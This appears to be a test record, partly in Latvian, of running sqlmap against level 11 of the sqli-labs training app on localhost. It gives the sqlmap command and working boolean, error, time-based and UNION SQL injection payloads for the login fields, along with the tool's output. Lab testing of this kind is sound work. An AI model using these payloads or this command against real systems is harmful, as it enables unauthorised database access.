=================================================================================
1. Īpašība: "Hello, World!" - vajadzētu strādāt visvienkāršākajām injekcijām
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: uname=test' or 1=1-- -&passwd=test
3.2. error-based: uname=test'&passwd=test
3.3. time-based: uname=test' or sleep(1)-- -&passwd=test
3.4. union: uname=test' union select 1,2-- -&passwd=test
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 206955 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-11/" -p uname,passwd --data="uname=test&passwd=test" -risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
7.3. POST parameter 'passwd' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
7.4. there were multiple injection points, please select the one to use for following injections: 0 (0 nozīmē = parameter: username)
=================================================================================
sqlmap identified the following injection point(s) with a total of 453 HTTP(s) requests:
---
Parameter: uname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: uname=test' OR NOT 7379=7379-- cqOj&passwd=test

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=test' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (ELT(2309=2309,1))),0x7170626a71),2309)-- WNcR&passwd=test

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test' AND (SELECT 1256 FROM (SELECT(SLEEP(5)))Mvoa)-- gEHn&passwd=test

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=test' UNION ALL SELECT CONCAT(0x71706a7671,0x61534363725961634f796e6c52545774765242467a66676b45734d71696c49636662715a6d6f5966,0x7170626a71),NULL-- -&passwd=test

Parameter: passwd (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: uname=test&passwd=test' OR NOT 9439=9439-- KQqC

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=test&passwd=test' AND GTID_SUBSET(CONCAT(0x71706a7671,(SELECT (ELT(8148=8148,1))),0x7170626a71),8148)-- OTyl

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test&passwd=test' AND (SELECT 9456 FROM (SELECT(SLEEP(5)))ZKpS)-- atRr

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=test&passwd=test' UNION ALL SELECT CONCAT(0x71706a7671,0x7a4b7378495261506774554474466769495679417a4e564d5249417645426e7677484c6864646467,0x7170626a71),NULL-- -
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.6
